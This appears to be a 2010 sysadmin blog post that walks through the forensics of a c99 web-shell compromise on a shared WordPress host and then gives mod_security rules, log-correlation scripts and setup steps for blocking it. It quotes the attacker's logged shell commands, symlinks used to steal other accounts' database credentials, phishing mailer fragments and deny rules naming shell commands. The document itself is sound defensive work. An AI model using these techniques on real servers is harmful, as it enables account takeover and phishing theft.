Webmail (SquirrelMail) was showing the following error when sending email:
-----------
Unknown response
435 Unable to authenticate at present
------------
Solution:
/scripts/mailperm --allaccounts --verbose
http://forums.cpanel.net/f5/email-exim-shadow-file-issue-150753.html
Wednesday, December 15, 2010
Monday, December 13, 2010
c99.php related hack prevention
A hacking attempt: how to get clues from the log files.
A user complains that his site is hacked.
The issue was traced to a file named phxdomain.php residing in the folder /home/username/www/word. This folder is a WordPress installation.
This phxdomain.php contained a c99-type script called "Egy Spider". The file was uploaded on May 11; the logs for that date are no longer present on the server.
See how the hacker compromised domain.net.
He opened the page http://domain.net/word/phxdomain.php in the browser:
79.176.202.245 - - [01/Jun/2010:12:48:12 -0400] "GET /word/phxdomain.php HTTP/1.1" 200 106040 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
The hacker then uploaded the script cp0.php:
79.176.202.245 - - [01/Jun/2010:12:48:42 -0400] "POST /word/phxdomain.php HTTP/1.1" 200 106107 "http://domain.net/word/phxdomain.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
root@server [/home/username/www/word]# cat cp0.php
/home/user3/public_html/cofiguration.php
lrwxrwxrwx 1 username username 44 Jun 1 13:11 dd -> /home/user3/public_html/configuration.php
lrwxrwxrwx 1 username username 1 Jun 1 12:51 dd.txt -> //
-rw-r--r-- 1 username username 1259 Jun 1 13:29 error_log
-rw-r--r-- 1 username username 76828 Jun 1 13:16 page1-help.php
root@server [/home/username/www/word]
lrwxrwxrwx 1 username username 36 Jun 1 13:29 ip.txt -> /home/crum/public_html/wp-config.php
lrwxrwxrwx 1 username username 36 Jun 1 13:28 ip -> /home/crum/public_html/wp-config.php
-rw-r--r-- 1 username username 1375 Jun 1 12:54 way.pl
-rw-r--r-- 1 username username 153213 Jun 1 12:51 ss.php
-rw-r--r-- 1 username username 13061 Jun 1 12:48 cp0.php
root@server [/home/username/www]
-rw-r--r-- 1 username username 872 Jun 2 05:09 dest1.php
-rw-r--r-- 1 username username 391 Jun 2 05:09 dest.php
-rw------- 1 username username 16043 Jun 2 05:06 allia.htm
-rw------- 1 username username 16274 Jun 2 05:06 alli.htm
How do we find out how dest1.php was uploaded to the server, and when?
-rw-r--r-- 1 username username 391 Jun 2 05:09 dest.php
Note the time it was uploaded: 05:09 on Jun 2.
From the logs we get this. images.php is a c99 script:
41.217.65.13 - - [02/Jun/2010:05:09:30 -0400] "POST /word/images.php?act=ls&d=%2Fhome%2Fhubcaps%2Fpublic_html%2F&sort=0a HTTP/1.1" 200 10342 "http://comphubcaps.net/word/images.php?act=ls&d=%2Fhome%2Fhubcaps%2Fpublic_html%2F&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
With the above act he uploaded the files urllist.txt, allia.htm and dest.php. After that he opened urllist.txt and allia.htm in the browser:
41.217.65.13 - - [02/Jun/2010:05:09:37 -0400] "GET /urllist.txt HTTP/1.1" 200 5283 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
41.217.65.13 - - [02/Jun/2010:05:10:04 -0400] "GET /allia.htm HTTP/1.1" 200 16043 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
After that he used dest.php to perform a POST operation:
41.217.65.13 - - [02/Jun/2010:05:10:18 -0400] "POST /dest.php HTTP/1.1" 302 - "http://comphubcaps.net/allia.htm" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
How can we confirm? Compare the time and date in the log with the file's modification time:
02/Jun/2010:05:09:30 -0400 ---> Jun 2 05:09 dest.php
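The correlation above (a POST to the shell script a few seconds before the new file's mtime) is the kind of check worth scripting, because a real access log has thousands of lines. The following is an added example, not part of the original post: it parses Apache combined-format lines, pulls out the c99-style act= parameter, and lists the POSTs that fall within a minute of a file's mtime as shown by ls -l. The sample log lines are constructed, modelled on the ones quoted above with hostnames and user agents shortened; the -0400 offset is taken from the post's log.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, the format of the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# c99-style "act" values: the ones seen in the post's logs plus the ones its rule lists.
SHELL_ACTS = {"ls", "chmod", "cd", "sql", "chown", "mkdir", "chdir",
              "mv", "cp", "ln", "rm", "touch"}

# Constructed sample log, modelled on the lines quoted in the post (hostnames,
# sizes and user agents shortened; the last line is a benign WordPress request).
SAMPLE_LOG = [
    '41.217.65.13 - - [02/Jun/2010:05:05:43 -0400] "GET /word/images.php?act=ls&d=%2Fhome%2Fusername%2Fpublic_html%2F&sort=0a HTTP/1.1" 200 10153 "-" "Mozilla/5.0"',
    '41.217.65.13 - - [02/Jun/2010:05:09:30 -0400] "POST /word/images.php?act=ls&d=%2Fhome%2Fusername%2Fpublic_html%2F&sort=0a HTTP/1.1" 200 10342 "http://domain.net/word/images.php" "Mozilla/5.0"',
    '41.217.65.13 - - [02/Jun/2010:05:09:37 -0400] "GET /urllist.txt HTTP/1.1" 200 5283 "-" "Mozilla/5.0"',
    '41.217.65.13 - - [02/Jun/2010:05:10:18 -0400] "POST /dest.php HTTP/1.1" 302 - "http://domain.net/allia.htm" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Jun/2010:05:11:02 -0400] "GET /word/?p=12&act=comment HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    query = parse_qs(urlsplit(rec["uri"]).query)
    rec["act"] = query.get("act", [None])[0]
    rec["d"] = query.get("d", [None])[0]  # c99 passes the working directory as d=
    return rec


def shell_requests(lines):
    """Records whose act= parameter is a known shell action (e.g. act=ls, act=sql)."""
    recs = (parse_line(l) for l in lines)
    return [r for r in recs if r and r["act"] in SHELL_ACTS]


def mtime_from_ls(year, month, day, hour, minute, utc_offset_hours=-4):
    """Aware datetime from the 'Jun 2 05:09' that ls -l prints. The year is supplied
    by hand (ls omits it for recent files); the offset defaults to the post's -0400."""
    return datetime(year, month, day, hour, minute,
                    tzinfo=timezone(timedelta(hours=utc_offset_hours)))


def requests_near(lines, file_mtime, window=timedelta(seconds=60), methods=("POST",)):
    """Records (POSTs by default) whose timestamp lies within `window` of a file's mtime.
    ls -l shows the mtime to the minute, so the window should be at least 60 seconds."""
    recs = (parse_line(l) for l in lines)
    return [r for r in recs
            if r and r["method"] in methods and abs(r["ts"] - file_mtime) <= window]


if __name__ == "__main__":
    dest_php_mtime = mtime_from_ls(2010, 6, 2, 5, 9)   # "Jun 2 05:09 dest.php"
    for r in shell_requests(SAMPLE_LOG):
        print(f"{r['ts']:%d/%b/%Y:%H:%M:%S} {r['ip']} {r['method']} act={r['act']} d={r['d']}")
    for r in requests_near(SAMPLE_LOG, dest_php_mtime):
        print(f"dest.php mtime {dest_php_mtime:%H:%M} <- {r['method']} {r['uri']} at {r['ts']:%H:%M:%S}")
```

Run against a real log, the first loop gives the list of shell actions (and the directories passed in d=) per source IP, and the second narrows the upload of a given file down to the single POST that created it; the benign act=comment request is not flagged because only the c99 action names are in SHELL_ACTS.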
Other details:
These are all hack-related files. See some of their contents below.
===========================================================
root@server [/home/username/www]# cat dest.php
";
mail("080890700f@gmail.com,0808@in.com", $subj, $msg, $from);
header("Location: alli.htm");
?>
root@server [/home/username/www]# cat dest1.php
";
mail("080890700f@gmail.com,0808@in.com", $subj, $msg, $from);
header("Location: http://www.alliance-leicester.co.uk/securedloansrfs/index.asp?page=home&ct=primarymenuDetallePie");
===========================================================
Solution applied on the server:
The issue here is that with a c99 script one can run shell commands from the browser: the basic commands are passed as parameters to the script in the URL. See the example of "ls /home/username/public_html/" issued through the URL by the hacker:
41.217.65.13 - - [02/Jun/2010:05:05:43 -0400] "GET /word/images.php?act=ls&d=%2Fhome%2Fusername%2Fpublic_html%2F&sort=0a HTTP/1.1" 200 10153 "http://domain.net/word/images.php?act=ls&d=%2Fhome%2Fusername%2Fpublic_html%2Fword%2F&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
To prevent this we can add mod_security rules to block requests that contain words such as home, public_html, etc. and common command names. This would block attempts at these kinds of attacks, but it may also stop legitimate users from accessing URLs. Example below:
There can be cases where the word "ln" is added to the modsec rules and a user opens a URL such as /lincoln, which contains the word "ln". In such cases remove the rule: SecRule REQUEST_URI "ln" "deny,log,status:406"
As a workaround we can block in modsec as follows.
Notice that php?act= is used here, so we can use a modsec rule as follows, which will prevent such attacks:
SecRule REQUEST_URI "\.php\?act=ls" "deny,log,status:406"
Similarly, check which "act" values he has used. Read below.
He uploaded a c99-like shell named page1-help.php.
He created symlinks to the DB config files of other accounts; from these he obtains the DB user and password.
lrwxrwxrwx 1 username username 44 Jun 1 13:11 dd -> /home/user3/public_html/configuration.php
See here:
root@server [/home/username/www/word/ss]# grep password /home/user3/public_html/configuration.php
var $password = 'XXXXYYYXXXYYY';
root@server [/home/hubcaps/www/word/ss]# grep user /home/user3/public_html/configuration.php
var $user = 'user3_db12';
Now see how he used page1-help.php from the browser to view/change database details of the account user3:
213.6.206.137 - - [01/Jun/2010:13:21:45 -0400] "GET /word/ss/page1-help.php?act=sql&sql_login=user3_db12&sql_passwd=XXXXYYYXXXYYY;&sql_server=localhost&sql_port=3306&sql_db=user3_NorthpawJooma&sql_db=user3_NorthpawJooma&sql_tbl=jos_users HTTP/1.1" 200 7481 "http://domain.net/word/ss/page1-help.php?act=sql&sql_login=user3_db12&sql_passwd=g:EbtBW%3EH-Yc9zHNWX$nwEpWvjK-CLY;&sql_server=localhost&sql_port=3306&sql_db=user3_NorthpawJooma&sql_tbl=jos_users&sql_act=tbldump&thistbl=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
Again another "act" was used here, act=sql. We can block multiple "act" values as follows:
SecRule REQUEST_URI "\.php\?act=(ls|chmod|cd|sql|chown|mkdir|chdir|mv|cp|ln|rm|touch)" "deny,log,status:406"
By adding more commands that the hacker may use, we can prevent the execution of commands through the c99 shell.
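Before putting a REQUEST_URI rule like the ones above into production it pays to run the pattern over a handful of known-good and known-bad URIs, the way the /lincoln problem was found. The following is an added example, not from the original post: it models the post's broad "ln" rule and its php?act= rule as Python regex searches over the URI (ModSecurity's REQUEST_URI is path plus query string), adds a third check modelled on a parameter-based rule (roughly SecRule ARGS:act "^(ls|chmod|...)$"), and reports false positives and misses for each. The sample URIs are constructed from the paths seen in the post; the ARGS-style rule and the benign /word/?p=12&act=comment URI are my assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Shell actions blocked by the post's final rule.
SHELL_ACTS = {"ls", "chmod", "cd", "sql", "chown", "mkdir", "chdir",
              "mv", "cp", "ln", "rm", "touch"}


def uri_rule(pattern):
    """Model of: SecRule REQUEST_URI "<pattern>" "deny,log,status:406"
    REQUEST_URI holds path plus query string; the match is an unanchored search."""
    rx = re.compile(pattern)
    return lambda uri: rx.search(uri) is not None


def args_act_rule(uri):
    """Model of a parameter-based rule (assumed, not from the post), roughly:
    SecRule ARGS:act "^(ls|chmod|cd|sql|chown|mkdir|chdir|mv|cp|ln|rm|touch)$" ...
    ARGS values are URL-decoded and do not depend on parameter order."""
    values = parse_qs(urlsplit(uri).query).get("act", [])
    return any(v.lower() in SHELL_ACTS for v in values)


BROAD = uri_rule(r"ln")   # the rule the post says to remove because of /lincoln
NARROW = uri_rule(r"\.php\?act=(ls|chmod|cd|sql|chown|mkdir|chdir|mv|cp|ln|rm|touch)")

# Constructed sample URIs, modelled on the paths in the post.
BENIGN = [
    "/lincoln",                                  # the post's own false-positive case
    "/word/?p=12&act=comment",                   # act= used by a normal application
    "/word/wp-admin/edit.php?post_type=page",
]
MALICIOUS = [
    "/word/images.php?act=ls&d=%2Fhome%2Fusername%2Fpublic_html%2F&sort=0a",
    "/word/ss/page1-help.php?act=sql&sql_login=user3_db12",
    "/word/images.php?sort=0a&act=ls",           # same action, act= not the first parameter
]


def false_positives(rule, benign):
    """Benign URIs the rule would deny."""
    return [u for u in benign if rule(u)]


def misses(rule, malicious):
    """Malicious URIs the rule would let through."""
    return [u for u in malicious if not rule(u)]


def report(rules, benign=BENIGN, malicious=MALICIOUS):
    """Map rule name -> (false positives, misses)."""
    return {name: (false_positives(r, benign), misses(r, malicious))
            for name, r in rules.items()}


if __name__ == "__main__":
    rules = {"broad 'ln'": BROAD, "php?act=": NARROW, "ARGS:act": args_act_rule}
    for name, (fp, miss) in report(rules).items():
        print(f"{name:12s} false positives={fp}  misses={miss}")
```

The report shows why the post moved from the word-list rule to the php?act= rule: the broad rule denies /lincoln and, since none of the sampled requests actually contain "ln", stops none of them. The php?act= rule has no false positives on the sample but only fires when act= is the first query parameter; if the shell is reached with the parameters in another order, a rule on ARGS:act, or adding t:urlDecodeUni,t:lowercase transformations to the REQUEST_URI rule, closes that gap while still leaving /lincoln alone.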
mod_security2 installation on Apache 2 and configuration (Linux)
Download and install modsec2:
cd /usr/src/src
wget http://www.modsecurity.org/download/modsecurity-apache_2.5.12.tar.gz
tar -zxf modsecurity-apache_2.5.12.tar.gz
cd modsecurity-apache_2.5.12/apache2
./configure --with-apxs=/usr/local/apache/bin/apxs
make
make install
You can see that the module mod_security2.so has been added to the /usr/local/apache/modules/ directory.
Now we need to configure modsec2. Create a file called /usr/local/apache/conf/modsec2.conf and enter the text below:
vi /usr/local/apache/conf/modsec2.conf
LoadModule security2_module modules/mod_security2.so
<IfModule mod_security2.c>
SecRuleEngine On
# See http://www.modsecurity.org/documentation/ModSecurity-Migration-Matrix.pdf
# "Add the rules that will do exactly the same as the directives"
# SecFilterCheckURLEncoding On
# SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/modsec_audit.log
SecDebugLog logs/modsec_debug_log
SecDebugLogLevel 0
SecDefaultAction "phase:2,deny,log,status:406"
SecRule REMOTE_ADDR "^127\.0\.0\.1$" nolog,allow
Include "/usr/local/apache/conf/modsec2.user.conf"
Include "/usr/local/apache/conf/apache2-modsec/rootkits.conf"
</IfModule>
You must add modsec rules to the files modsec2.user.conf and rootkits.conf. You can download rules from here:
http://www.gotroot.com/downloads/ftp/mod_security/2.0/apache2/
Add the following line to the httpd.conf file:
Include "/usr/local/apache/conf/modsec2.conf"
Check that the Apache configuration syntax is correct:
/etc/rc.d/init.d/httpd configtest
If the syntax is OK, do a graceful restart of Apache:
/etc/rc.d/init.d/httpd graceful
To test, add the following rule to the file /usr/local/apache/conf/apache2-modsec/rootkits.conf and open the URL below to see whether it gives a modsec error (406):
SecRule REQUEST_URI "/bin" "deny,log,status:406"
http://main_IP/bin